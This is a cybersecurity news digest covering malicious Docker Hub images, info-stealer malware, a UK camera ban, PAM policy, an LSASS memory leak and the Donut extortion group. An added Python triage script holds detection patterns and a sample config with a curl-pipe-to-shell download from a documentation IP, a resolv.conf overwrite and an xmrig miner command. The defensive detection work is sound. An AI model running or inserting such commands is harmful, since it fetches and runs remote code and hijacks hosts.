Docker Hub repositories hide over 1,650 malicious containers

From bleepingcomputer.com


Over 1,600 publicly available Docker Hub images hide malicious behavior, including cryptocurrency miners, embedded secrets that can be used as backdoors, DNS hijackers, and website redirectors.

Docker Hub is a cloud-based container library allowing people to freely search and download Docker images or upload their creations to the public library or personal repositories.

Docker images are templates for the quick and easy creation of containers that contain ready-to-use code and applications. Therefore, those looking to set up new instances often turn to Docker Hub to quickly find an easily deployable application.

Unfortunately, due to abuse of the service by threat actors, over a thousand malicious uploads introduce severe risks to unsuspecting users deploying malware-laden images on locally hosted or cloud-based containers.
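Before running an unfamiliar image, a practitioner would at least read its config rather than trust the repository name. The script below is an added example, not code from the article or from Docker: it triages an image config JSON (the shape produced by `docker image inspect` or `skopeo inspect --config`) for the four abuse classes the article lists: embedded secrets in ENV, miner invocations, DNS tampering and download-and-execute commands. The indicator strings, regexes, entropy threshold and the sample config are constructed assumptions for illustration, not indicators from the report.

```python
"""Triage a container image config for the abuse classes described above.

Input: the image config dict from `docker image inspect` (key "Config") or an
OCI image config (keys "config" and "history"). Indicator lists below are
illustrative assumptions, not a vetted threat-intel feed.
"""
import json
import math
import re

# Illustrative indicators (assumptions): miner binaries/pool schemes, DNS tampering.
MINER_HINTS = ("xmrig", "minerd", "cpuminer", "stratum+tcp://", "nicehash")
DNS_TAMPER = ("/etc/resolv.conf", "/etc/hosts", "iptables -t nat", "--dport 53")
PIPE_TO_SHELL = re.compile(r"(curl|wget)[^|]*\|\s*(ba)?sh\b")
SECRET_PATTERNS = {
    "aws_access_key": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "private_key": re.compile(r"-----BEGIN (?:RSA |OPENSSH |EC )?PRIVATE KEY-----"),
    "ssh_pubkey": re.compile(r"\bssh-(?:rsa|ed25519) AAAA[0-9A-Za-z+/]+"),
}
SECRET_ENV_NAMES = re.compile(r"(PASS|PASSWD|SECRET|TOKEN|API_?KEY|PRIVATE)", re.I)


def shannon_entropy(s):
    """Bits per character; a 32-char random hex string scores close to 4.0."""
    if not s:
        return 0.0
    counts = {}
    for ch in s:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def triage_image_config(config):
    """Return a list of (category, detail) findings for one image config dict."""
    cfg = config.get("config") or config.get("Config") or {}
    findings = []

    # 1. Secrets baked into ENV: the "embedded secret as backdoor" class.
    for env in cfg.get("Env") or []:
        name, _, value = env.partition("=")
        for label, pat in SECRET_PATTERNS.items():
            if pat.search(value):
                findings.append(("embedded_secret", f"{name}: matches {label}"))
        # Generic catch: secret-looking variable name plus a long high-entropy value.
        if SECRET_ENV_NAMES.search(name) and len(value) >= 20 and shannon_entropy(value) > 3.5:
            findings.append(("embedded_secret", f"{name}: high-entropy value"))

    # 2. Miner, DNS tampering and pipe-to-shell in Entrypoint/Cmd and build history.
    texts = list(cfg.get("Entrypoint") or []) + list(cfg.get("Cmd") or [])
    texts += [h.get("created_by", "") for h in config.get("history") or []]
    for text in texts:
        low = text.lower()
        for hint in MINER_HINTS:
            if hint in low:
                findings.append(("cryptominer", f"{hint!r} in {text[:60]!r}"))
        for hint in DNS_TAMPER:
            if hint in text:
                findings.append(("dns_tampering", f"{hint!r} in {text[:60]!r}"))
        if PIPE_TO_SHELL.search(text):
            findings.append(("pipe_to_shell", text[:80]))
    return findings


def triage_image_config_json(text):
    """Convenience wrapper for raw JSON (e.g. the output of `skopeo inspect --config`)."""
    return triage_image_config(json.loads(text))


# Constructed sample config (not a real image). 203.0.113.0/24 is a documentation range.
SAMPLE_CONFIG = {
    "config": {
        "Env": [
            "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
            "AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE",
            "ADMIN_TOKEN=f3a9c2e1b7d4085e6a1c9f0b2d7e4a6c",
        ],
        "Entrypoint": ["/bin/sh", "-c"],
        "Cmd": ["curl -s http://203.0.113.5/x.sh | sh"],
    },
    "history": [
        {"created_by": "/bin/sh -c #(nop) ADD file:abc in /"},
        {"created_by": "/bin/sh -c echo 'nameserver 203.0.113.53' > /etc/resolv.conf"},
        {"created_by": "/bin/sh -c /opt/xmrig -o stratum+tcp://pool.example.net:3333"},
    ],
}

if __name__ == "__main__":
    for category, detail in triage_image_config(SAMPLE_CONFIG):
        print(f"{category:16} {detail}")
```

In practice feed it `skopeo inspect --config docker://<repo>@sha256:<digest>` so the check runs against the exact digest you intend to deploy, and treat a hit as a reason to read the layers, not as a verdict; string matching is easily evaded, which is why the article's figure of 1,600 images came from deeper analysis.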

Read more…

Cybercriminals are increasingly using info-stealing malware to target victims

From csoonline.com


Cybercriminals are increasingly shifting from automated scam-as-a-service schemes to distributing more advanced info-stealer malware as competition for resources increases and they look for new ways to make profits, according to a report by Group-IB.

The cybersecurity company has identified 34 Russian-speaking groups distributing info-stealing malware under the stealer-as-a-service model.

Info stealer malware collects users’ credentials stored in browsers, gaming accounts, email services, social media, bank card details, and crypto wallet information from infected computers, and sends the data to the malware operator. This data is then sold or used for fraud on the dark web. 

Read more…

British government bans Chinese surveillance cameras from sensitive locations

From therecord.media


The British government has banned departments from installing surveillance cameras manufactured by Chinese companies at sensitive locations due to potential information security issues, and is facing calls to ban them entirely from the public sector.

Announcing the findings of a security review on Thursday, Cabinet Office minister Oliver Dowden said that the restrictions were being introduced “in light of the threat to the UK and the increasing capability and connectivity of these systems.”

Not only will the equipment be disallowed from sensitive sites, departments have also been advised that the same equipment should never be connected to core networks if installed elsewhere. The updated guidance also encourages departments to consider stripping the cameras out from less sensitive sites too to avoid introducing additional risks.

Read more…

What Is a Privileged Access Management (PAM) Policy?

From heimdalsecurity.com

Cybersecurity technology goes hand in hand with policy-based governance, but simply developing a password policy to protect company data and information is not enough. One of the first steps to successfully implementing a privileged access management (PAM) solution is defining clear and consistent policies that everyone who uses and manages privileged accounts understands and accepts.

Let's see what a privileged access management (PAM) policy is and why organizations need one.

Read more…

New Windows Server updates cause domain controller freezes, restarts

From bleepingcomputer.com


Microsoft is investigating LSASS memory leaks (caused by Windows Server updates released during the November Patch Tuesday) that might lead to freezes and restarts on some domain controllers.

LSASS (short for Local Security Authority Subsystem Service) is responsible for enforcing security policies on Windows systems, and it handles access token creation, password changes, and user logins.

If this service crashes, logged-in users immediately lose access to Windows accounts on the machine, and they’re shown a system restart error followed by a system reboot.
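A leak of this kind shows up as steady growth of the lsass.exe working set between a domain controller's restarts, so the practical check while a fix is pending is to sample it and alert on growth. The function below is an added example, not code from the article or from Microsoft; it assumes it is run locally on the domain controller with administrative rights, and the sample count, interval and growth threshold are illustrative values to tune for your environment. The hotfix query assumes the November Patch Tuesday date of 8 November 2022.

```powershell
# Added example (not from the article): sample the lsass.exe working set over time
# on a domain controller and flag sustained growth, the symptom of the leak described.
# Assumptions: run locally on the DC as an administrator; thresholds are illustrative.
function Watch-LsassMemory {
    param(
        [int]$Samples = 12,
        [int]$IntervalSeconds = 300,
        [int]$GrowthThresholdMB = 200   # flag if the working set grows by more than this over the run
    )
    $lsass = Get-Process -Name lsass -ErrorAction Stop
    $firstMB = [math]::Round($lsass.WorkingSet64 / 1MB, 1)
    $readings = @()
    for ($i = 0; $i -lt $Samples; $i++) {
        $ws = (Get-Process -Id $lsass.Id -ErrorAction Stop).WorkingSet64
        $readings += [pscustomobject]@{
            Time         = Get-Date
            WorkingSetMB = [math]::Round($ws / 1MB, 1)
        }
        if ($i -lt $Samples - 1) { Start-Sleep -Seconds $IntervalSeconds }
    }
    $growth = $readings[-1].WorkingSetMB - $firstMB
    $readings | Format-Table -AutoSize
    if ($growth -gt $GrowthThresholdMB) {
        Write-Warning ("lsass working set grew {0} MB over {1} samples; suspect the update-related leak" -f $growth, $Samples)
    }
    [pscustomobject]@{ StartMB = $firstMB; EndMB = $readings[-1].WorkingSetMB; GrowthMB = $growth; Flagged = ($growth -gt $GrowthThresholdMB) }
}

# Which updates landed since the November 2022 Patch Tuesday (assumed date 2022-11-08)?
function Get-RecentHotfixes {
    param([datetime]$Since = [datetime]'2022-11-08')
    Get-HotFix | Where-Object InstalledOn -ge $Since | Select-Object HotFixID, InstalledOn
}

# Usage: one hour of five-minute samples, then the list of recent updates.
Watch-LsassMemory -Samples 12 -IntervalSeconds 300
Get-RecentHotfixes
```

Correlate a flagged result with the installed update list before rolling anything back: the leak only matters if the November update is actually present, and a DC whose working set is flat across the sampling window is not affected regardless of patch level.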

Read more…

Donut extortion group also targets victims with ransomware

From bleepingcomputer.com


The Donut (D0nut) extortion group has been confirmed to deploy ransomware in double-extortion attacks on the enterprise.

BleepingComputer first reported on the Donut extortion group in August, linking them to attacks on Greek natural gas company DESFA, UK architectural firm Sheppard Robson, and multinational construction company Sando.

Strangely, the data for Sando and DESFA was also posted to several ransomware operations’ sites, with the Sando attack claimed by Hive ransomware and DESFA claimed by Ragnar Locker.

Unit 42 researcher Doel Santos also shared that the Tox ID used in ransom notes was seen in samples of the HelloXD ransomware.

This cross-posting of stolen data and affiliation leads us to believe the threat actor behind Donut Leaks is an affiliate for numerous operations, now trying to monetize the data in their own operation.

Read more…